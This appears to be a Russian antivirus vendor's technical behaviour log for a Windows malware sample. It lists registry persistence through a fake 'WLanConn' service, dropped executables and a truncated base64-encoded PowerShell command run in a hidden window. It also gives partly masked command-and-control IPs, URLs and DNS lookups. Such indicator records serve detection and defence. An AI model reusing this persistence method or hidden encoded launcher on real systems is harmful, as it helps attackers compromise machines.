Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\EFS] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\WLanConn] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\WLanConn] 'ImagePath' = '"%WINDIR%\SysWOW64\MP43DECD\WLanConn.exe"'
- 'WLanConn' "%WINDIR%\SysWOW64\MP43DECD\WLanConn.exe"
- 'WLanConn' %WINDIR%\SysWOW64\MP43DECD\WLanConn.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAgADgANABaAEcAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAtAEYAIAAnAFMAeQBzACcALAAnAEQAJwAsACcAaQAnACwAJwBSACcALAAnAFQARQ...
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe в %WINDIR%\syswow64\mp43decd\wlanconn.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- '19#.#02.229.74':80
- '11#.#9.11.81':7080
- '70.##.251.94':8080
- http://at###style.com/wp-admin/pB/
- http://70.##.251.94:8080/8iL8oPWMy7/kj4rpOv/OXry/ via 70.##.251.94
- DNS ASK at###style.com
- DNS ASK ni###angseo.com
- DNS ASK mr##ggy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAgADgANABaAEcAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAtAEYAIAAnAFMAeQBzACcALAAnAEQAJwAsACcAaQAnACwAJwBSACcALAAnAFQARQ...' (со скрытым окном)